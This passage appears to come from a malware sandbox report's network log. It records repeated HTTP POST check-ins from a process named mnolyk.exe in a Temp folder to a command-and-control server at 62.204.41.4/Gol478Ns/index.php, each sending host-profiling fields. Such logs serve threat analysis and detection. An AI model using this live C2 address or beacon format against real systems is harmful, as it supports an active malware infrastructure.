                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      527192.168.2.75022262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:23.463165045 CET642OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:23.525696039 CET642INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:23 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      528192.168.2.75022362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:23.700905085 CET643OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:23.765327930 CET643INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:23 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      529192.168.2.75022462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:23.949840069 CET644OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:24.015782118 CET644INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:23 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      53192.168.2.74974862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:14.403703928 CET168OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:14.465245962 CET168INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:14 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      530192.168.2.75022562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:24.183238983 CET645OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:24.246649027 CET645INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:24 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      531192.168.2.75022662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:24.417895079 CET646OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:24.481350899 CET646INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:24 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      532192.168.2.75022762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:24.691349983 CET647OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:24.755100012 CET647INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:24 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      533192.168.2.75022862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:24.958281994 CET648OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:25.022794962 CET648INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:24 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      534192.168.2.75022962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:25.211608887 CET649OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:25.275871992 CET649INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:25 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      535192.168.2.75023062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:25.448060989 CET650OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:25.512218952 CET650INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:25 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      536192.168.2.75023162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:25.697760105 CET651OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:25.781003952 CET651INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:25 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      537192.168.2.75023262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:25.965511084 CET652OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:26.030555964 CET652INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:25 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      538192.168.2.75023362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:26.208390951 CET653OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:26.273317099 CET653INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:26 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      539192.168.2.75023462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:26.686624050 CET654OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:26.749392033 CET654INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:26 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      54192.168.2.74974962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:14.642908096 CET169OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:14.706435919 CET169INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:14 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      540192.168.2.75023562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:27.132915020 CET655OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:27.195987940 CET655INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:27 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      541192.168.2.75023662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:27.474416018 CET656OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:27.538129091 CET656INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:27 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      542192.168.2.75023762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:28.175009012 CET657OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:28.239854097 CET657INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:28 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      543192.168.2.75023862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:28.505872011 CET658OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:28.570128918 CET658INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:28 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      544192.168.2.75023962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:29.333775997 CET659OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
